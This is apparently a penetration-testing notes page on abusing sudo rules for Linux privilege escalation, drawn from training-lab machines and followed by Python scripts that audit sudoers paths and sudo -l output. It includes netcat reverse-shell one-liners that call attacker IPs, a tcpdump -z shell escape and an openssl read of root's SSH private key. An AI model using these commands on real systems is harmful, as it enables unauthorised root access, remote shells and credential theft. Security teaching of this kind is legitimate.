# Sudo Rights Abuse

## ALL : ALL

```shell-session
sudo -l
[sudo] password for user1:
...SNIP...

User user1 may run the following commands on ExampleServer:
    (ALL : ALL) ALL

sudo su -

[sudo] password for user1:
whoami
root
```

## (ALL, !root)

{% content-ref url="services-and-internals-enum" %}
[services-and-internals-enum](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/services-and-internals-enum)
{% endcontent-ref %}

## NOPASSWD

### Example 1 - USER

```shell-session
sudo -l

    (user : user) NOPASSWD: /bin/echo

sudo -u user /bin/echo Hello World!

    Hello World!
```

```shell-session
User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/webadmin/luvit

# Exploitation
webadmin@traceback:/etc/update-motd.d$ sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
sysadmin@traceback:/etc/update-motd.d$
```

### Example 2 - USER2 - Lateral Movement

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FJrQSRaac2cMI6uzOVRvJ%2Fimage.png?alt=media&#x26;token=7f7d5df5-f77d-4363-88f1-874eb2254344" alt=""><figcaption></figcaption></figure>

### Example 3 - ROOT - tcpdump

```shell-session
sudo -l

Matching Defaults entries for sysadm on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sysadm may run the following commands on NIX02:
    (root) NOPASSWD: /usr/sbin/tcpdump
```

* <https://gtfobins.github.io/gtfobins/tcpdump/>

```shell-session
cat /tmp/.test

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f
```

```shell-session
sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

dropped privs to root
tcpdump: listening on ens192, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
6 packets received by filter
compress_savefile: execlp(/tmp/.test, /dev/null) failed: Permission denied
0 packets dropped by kernel
```

```shell-session
nc -lnvp 443

listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.129.2.12] 38938
bash: cannot set terminal process group (10797): Inappropriate ioctl for device
bash: no job control in this shell

root@NIX02:~# id && hostname
uid=0(root) gid=0(root) groups=0(root)
NIX02
```

### Example 4 - Python

```shell-session
htb-student@lpenix:~$ sudo -l 

Matching Defaults entries for htb-student on ACADEMY-LPENIX:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User htb-student may run the following commands on ACADEMY-LPENIX:
    (ALL : ALL) SETENV: NOPASSWD: /usr/bin/python3
```

The `SETENV` tag lets the caller set environment variables for the command. See **Privilege Escalation using PYTHONPATH Environment Variable**:

{% content-ref url="python-library-hijacking" %}
[python-library-hijacking](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/python-library-hijacking)
{% endcontent-ref %}

### Example 5 - script - write permission

```shell-session
$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -la
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10  2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh
```

Change script content:

```shell-session
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1| nc 10.10.16.110 4444 >/tmp/f" > monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
```
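The precondition for this example is visible in the `ls -la` output: the script and its directory belong to the unprivileged user, and the script is mode 0777. The following is an added example, not from the original notes, of a check an administrator can run over each command path listed in sudoers; the function name and the `trusted_uids` parameter are assumptions of this example.

```python
import os
import stat

def unsafe_path_components(command_path, trusted_uids=frozenset({0})):
    """List parts of a sudo-allowed path that an untrusted user could modify.

    The file and every parent directory must be owned by a trusted uid
    (root only by default; `trusted_uids` is this example's own parameter)
    and must not be group- or world-writable. Sticky directories such as
    /tmp are tolerated because entries there cannot be replaced by non-owners.
    """
    findings = []
    current = os.path.realpath(command_path)
    while True:
        info = os.stat(current)
        mode = stat.S_IMODE(info.st_mode)
        if info.st_uid not in trusted_uids:
            findings.append((current, f"owned by uid {info.st_uid}"))
        writable = mode & (stat.S_IWGRP | stat.S_IWOTH)
        sticky_dir = stat.S_ISDIR(info.st_mode) and mode & stat.S_ISVTX
        if writable and not sticky_dir:
            findings.append((current, f"mode {mode:04o} is group/world-writable"))
        parent = os.path.dirname(current)
        if parent == current:  # reached the filesystem root
            return findings
        current = parent

if __name__ == "__main__":
    import tempfile
    # Constructed stand-in for monitor.sh with the 0777 mode shown above.
    with tempfile.TemporaryDirectory() as tmp:
        script = os.path.join(tmp, "monitor.sh")
        open(script, "w").close()
        os.chmod(script, 0o777)
        for path, reason in unsafe_path_components(script):
            print(path, "->", reason)
```

Any finding means the sudoers rule effectively grants whatever the path's owner or writers choose to put there, so the command should be moved to a root-owned location or the rule removed.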

### Example 6 - LD\_PRELOAD

```shell-session
htb_student@NIX02:~$ sudo -l

Matching Defaults entries for daniel.carter on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

User daniel.carter may run the following commands on NIX02:
    (root) NOPASSWD: /usr/sbin/apache2 restart
```

This user can restart the Apache service as root. Because this is not a [GTFOBin](https://gtfobins.github.io/#apache) and the `/etc/sudoers` entry specifies the absolute path, this could not be used to escalate privileges under normal circumstances.

However, the `Defaults` line includes `env_keep+=LD_PRELOAD`, so it can be abused with **LD\_PRELOAD**.

{% content-ref url="shared-libraries" %}
[shared-libraries](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/shared-libraries)
{% endcontent-ref %}

### Example 7 - Openssl

```shell-session
$ sudo -l

Matching Defaults entries for srvadm on dmz01:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User srvadm may run the following commands on dmz01:
  (ALL) NOPASSWD: /usr/bin/openssl
```

```shell-session
$ LFILE=/root/.ssh/id_rsa
$ sudo /usr/bin/openssl enc -in $LFILE
```
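From the administrator's side, the patterns in the examples above can be caught by reviewing `sudo -l` output for each account. The following is an added example, not part of the original notes: `audit_sudo_listing`, `RISKY_BINARIES` and the sample listing are constructed for illustration, and the binary list only covers commands named on this page.

```python
import re

# Binaries this page shows being abused through sudo (illustrative, not exhaustive).
RISKY_BINARIES = {"tcpdump", "python3", "openssl", "luvit"}
# Dynamic-loader variables that should never be preserved via env_keep.
LOADER_VARS = ("LD_PRELOAD", "LD_LIBRARY_PATH")
# Rule line as printed by `sudo -l`: "(runas) [TAG: ...] command [args]".
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(\S+)")

def audit_sudo_listing(text):
    """Return a list of (severity, message) findings for `sudo -l` output."""
    findings = []
    for line in text.splitlines():
        if "env_keep" in line:
            for var in LOADER_VARS:
                if var in line:
                    findings.append(("high", f"env_keep preserves {var}"))
        match = RULE_RE.match(line)
        if not match:
            continue
        runas, raw_tags, command = match.groups()
        tags = {t.strip() for t in raw_tags.split(":") if t.strip()}
        name = command.rsplit("/", 1)[-1]
        if command == "ALL":
            findings.append(("high", f"({runas}) ALL allows every command"))
        if "SETENV" in tags:
            findings.append(("high", f"SETENV on {command}: caller sets the environment"))
        if name in RISKY_BINARIES:
            note = " without a password" if "NOPASSWD" in tags else ""
            findings.append(("high", f"{command} runs as ({runas}){note}"))
        if command.startswith("/home/"):
            findings.append(("medium", f"{command} is under /home: check owner and mode"))
    return findings

# Constructed sample assembled from the listings shown on this page.
SAMPLE = """\
Matching Defaults entries for daniel.carter on NIX02:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD

User daniel.carter may run the following commands on NIX02:
    (root) NOPASSWD: /usr/sbin/apache2 restart
    (ALL : ALL) SETENV: NOPASSWD: /usr/bin/python3
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
    (user : user) NOPASSWD: /bin/echo
"""

if __name__ == "__main__":
    for severity, message in audit_sudo_listing(SAMPLE):
        print(f"[{severity}] {message}")
```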
